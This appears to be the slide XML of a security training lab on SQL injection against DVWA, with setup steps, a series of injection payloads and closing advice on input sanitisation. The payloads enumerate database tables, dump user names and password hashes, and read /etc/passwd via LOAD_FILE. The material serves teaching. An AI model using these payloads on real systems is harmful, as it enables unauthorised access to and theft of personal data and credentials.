              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>OR 1 = 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty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 dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t>These are OR statements which means just one part needs to be True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t>Thus, all statements will be True, so it will display all user data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tw Cen MT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ACBC4-DCE1-453E-B92D-67BA8886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907" y="456338"/>
            <a:ext cx="1622067" cy="258356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3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B1AA-385D-4177-B37F-6408AD9C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D5CD-9319-41E6-BA6C-E214DAB0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2136"/>
            <a:ext cx="5507990" cy="3824744"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t>Now, try to input your own command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>User ID:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>1' OR 1=1 UNION SELECT null, database()#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t>Notice the last ‘Surname’ is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>dvwa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2025" b="1" dirty="0">
              <a:latin typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>This executed the command database() to show us the database name!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>This tells us something about the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>structure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> of the target database and we can begin to feel our way around the database to make sense of it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t>This is how you can insert your own SQL commands!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1FFB-C6A3-4D39-BDEC-A0DE59E0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00" y="365127"/>
            <a:ext cx="2826296" cy="271785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2CF03-68C8-4B97-8BE8-D8012174B151}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6977536" y="3399795"/>
            <a:ext cx="1973424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b="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Executed the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1125">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>database() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1125" b="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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F45CE2-30F5-4518-BAD5-8653A3D56827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6852933" y="3019415"/>
            <a:ext cx="856146" cy="363116"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:pr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144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9C5-E139-4BF3-BAE9-5F6FEFDA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F4AD-B9EA-4E0A-9C1C-E22B576AB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35346"/>
            <a:ext cx="8271511" cy="3820573"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t>Try the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="733425" lvl="1" indent="-257175"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>User ID:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="19078" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>1' OR 1=1 UNION SELECT null, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t> #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t>’ is showing you all the information about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" i="1" dirty="0"/>
              <a:t>other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t> databases on the MySQL server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>Limit it to relevant information about the users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</a:rPr>
              <a:t>1' OR 1=1 UNION SELECT null, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>      WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t> LIKE ‘user%’ #</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t>You should see the tables with the headers that begin with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1725" dirty="0"/>
              <a:t>What do you think we can find in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1725" b="1" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1725" dirty="0"/>
              <a:t> table?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078B-7A49-4CA8-9411-6B8AE31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5107-16CF-4763-A0AB-5B6B90C7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515350" cy="1279664"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Display all of the columns in the ‘users’ table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</a:rPr>
              <a:t>1' and 1=1 UNION SELECT null, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>(table_name,0x0a,column_name) FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t> = 'users' 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B01D2-7ECB-45EB-87E4-C7796760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84663"/>
            <a:ext cx="2104517" cy="224135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C9227-E0EA-4BEB-9B28-9426BE4E8A1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3286177" y="4130021"/>
            <a:ext cx="5431103" cy="103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sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What do we think can be found from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> column?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" b="1" dirty="0"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CF19A9-2ED9-4A70-833B-852D97F11ABD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1181660" y="4622656"/>
            <a:ext cx="2043113" cy="278169"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:pr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2208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E034-6995-4CE8-81C9-E1FEAAAF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C5BD-E2E6-4121-AB8D-B8315414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38" y="1692136"/>
            <a:ext cx="8519562" cy="3723144"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>List all the passwords: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1' AND 1=1 UNION SELECT null, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(password) FROM users #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Notice this displays all the passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>List all the passwords with the names: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1' AND 1=1 UNION SELECT null, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, user, password) FROM users #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Add the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>0x0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> control character to format the data better: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1' AND 1=1 UNION SELECT null, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, 0x0a, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, 0x0a, user, 0x0a, password) FROM users #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>You should see all the user information - including the hashed passwords!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CDC55-431C-489D-8F35-5152B7BE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27" y="217186"/>
            <a:ext cx="2716026" cy="77912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CC945-4F1F-4D34-9958-2A5C12D3DF77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6902491" y="1599053"/>
            <a:ext cx="1973424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b="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What can be done with hashed passwords?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7346F7-7602-4FFD-AE7A-762F9AE1BA64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7322369" y="1085539"/>
            <a:ext cx="617826" cy="448625"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:pr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6237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CE0C-64F6-476A-BAA3-6B928E1D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D95D-18C7-4EF3-B91F-1AB77A00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8000"/>
            <a:ext cx="7886700" cy="4398964"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>What if you want to load a file from the server?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>What about a sensitive file... like, say, user passwords?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Try to load the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> file from the Kali Linux system:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="CordiaUPC" panose="020B0502040204020203" pitchFamily="34" charset="-34"/>
              </a:rPr>
              <a:t>1' OR 1=1 UNION SELECT null, LOAD_FILE(‘/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="CordiaUPC" panose="020B0502040204020203" pitchFamily="34" charset="-34"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="CordiaUPC" panose="020B0502040204020203" pitchFamily="34" charset="-34"/>
              </a:rPr>
              <a:t>/passwd’)#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Were you able to see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> file?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>What else can be done with this capability?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30BFA-C9D2-4F93-B105-D306789D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22" y="3307027"/>
            <a:ext cx="3142084" cy="215643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64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376"/>
            <a:ext cx="8286750" cy="3956824"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limit information available in a database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why are hashed passwords stored on this database?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sanitize the inputs!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reject inputs that are not what the search was meant for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NEVER trust user input – check it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enumerate options for the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Numeric fields do not contain characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Email fields look like actual email addresses (what's that pattern look like?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What are some other ways of defending against an SQL Injection attack?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43FB7-1251-4D6B-98F8-C409F18FFC8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8413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b="0" dirty="0"/>
              <a:t>How to Defend Against an SQL Injection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Materials needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Kali Virtual Machine (With DVWA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Windows Virtual Machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Software Tool used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>DVWA (Damn Vulnerable Web Application)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Follow the DVWA Setup Lab if not previously installed/available on your VM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Security+ Objectives (SY0-501)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="583406" lvl="1" indent="-107156"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Objective 1.2 – Compare and contrast types of attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="821531" lvl="2" indent="-107156"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Application/Service Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1059656" lvl="3"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>DHS CAE Units</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CTH – Describe different types of attacks and their characteristics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SQL Injection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990"/>
            <a:ext cx="8129270" cy="2784690"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A SQL Injection is an injection attack where attackers use SQL commands to bypass a website's security to gain access to data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The hackers could gain access to personal and private information from this database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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SQL Injection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744"/>
            <a:ext cx="6666230" cy="2626255"/>
          </a:xfrm>
        </p:spPr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  <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access DVWA website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lower DVWA security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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042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FBA7CDE-8F5A-4E7D-AA41-0BB9D18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3750" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4130" dirty="0"/>
              <a:t>Find the IP Address (Kali Machine)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1CB140-95D1-404C-814F-B73E6B01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86278"/>
            <a:ext cx="8180071" cy="3762682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the IP address of the Kali machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Open the Terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="24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2000" b="1" dirty="0"/>
              <a:t>hostname -I</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>This will display the IP Address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Write down the Kali VM IP address</a:t>
            </a:r>
          </a:p>
          <a:p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4AA6C1-9549-4BC7-97C6-B9668B2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81" y="3179893"/>
            <a:ext cx="4062739" cy="77385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726B76-1341-4315-9C53-9DA51693D917}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6276669" y="4416621"/>
            <a:ext cx="174249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12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109A9B-B236-46DA-B74B-C4E6918711F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764607" y="3623455"/>
            <a:ext cx="1383308" cy="7931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979-6998-42B3-B29E-686B84C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into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2B0B-B1AD-4208-9429-4F79D3A0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833494"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start up the web servers (on the Kali machine)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you used the DVWA Setup Lab, use the following command to start XAMPP (then start/restart all the servers):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> /opt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>lampp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/./manager-linux-x64.run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On the Windows Machine, go to the DVWA webpage</a:t>
            </a:r>
          </a:p>
          <a:p>
